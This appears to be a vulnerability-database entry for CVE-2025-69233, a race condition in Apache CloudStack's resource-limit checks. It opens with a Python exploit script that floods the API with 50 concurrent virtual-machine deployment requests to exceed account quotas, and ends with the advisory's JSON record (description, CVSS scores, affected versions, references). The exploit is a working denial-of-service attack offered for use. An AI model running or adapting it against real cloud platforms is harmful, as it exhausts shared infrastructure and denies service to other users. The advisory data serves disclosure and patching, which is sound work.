CVE-2025-69233

import requests import threading # Target API endpoint for resource allocation (e.g., creating a VM or volume) TARGET_URL = "http://cloudstack-server:8080/client/api" API_KEY = "YOUR_API_KEY" SECRET_KEY = "YOUR_SECRET_KEY" # Command to deploy a virtual machine or allocate resource PAYLOAD = { "command": "deployVirtualMachine", "serviceOfferingId": "1", "templateId": "1", "zoneId": "1", "response": "json" } def allocate_resource(): """Function to send a single allocation request""" try: # Send request to trigger resource allocation response = requests.get(TARGET_URL, params=PAYLOAD, auth=(API_KEY, SECRET_KEY)) print(f"Request sent, status code: {response.status_code}") except Exception as e: print(f"Error: {e}") # Exploit logic: Spawn multiple threads to trigger the race condition threads = [] num_requests = 50 # Number of concurrent requests to trigger the race condition print(f"Starting attack with {num_requests} concurrent requests...") for i in range(num_requests): t = threading.Thread(target=allocate_resource) threads.append(t) t.start() for t in threads: t.join() print("Attack finished. Check resource quotas.")

{"cve": {"id": "CVE-2025-69233", "sourceIdentifier": "[email protected]", "published": "2026-05-08T13:16:35.993", "lastModified": "2026-05-09T07:16:08.847", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to multiple time-of-check time-of-use race conditions in the resource count check and increment logic, as well as missing validations, users of the platform are able to exceed the allocation limits configured for their accounts/domains. This can be used by an attacker to degrade the infrastructure's resources and lead to denial of service conditions.\n\nUsers are recommended to upgrade to Apache CloudStack versions 4.20.3.0 or 4.22.0.1, or later, which fixes this issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-367"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.20.3.0", "matchCriteriaId": "B0820043-939A-4549-AE30-03196C079366"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.21.0.0", "versionEndExcluding": "4.22.0.1", "matchCriteriaId": "78690ED1-C4B3-4DC9-9B53-FB31D6D17125"}]}]}], "references": [{"url": "https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/09/5", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}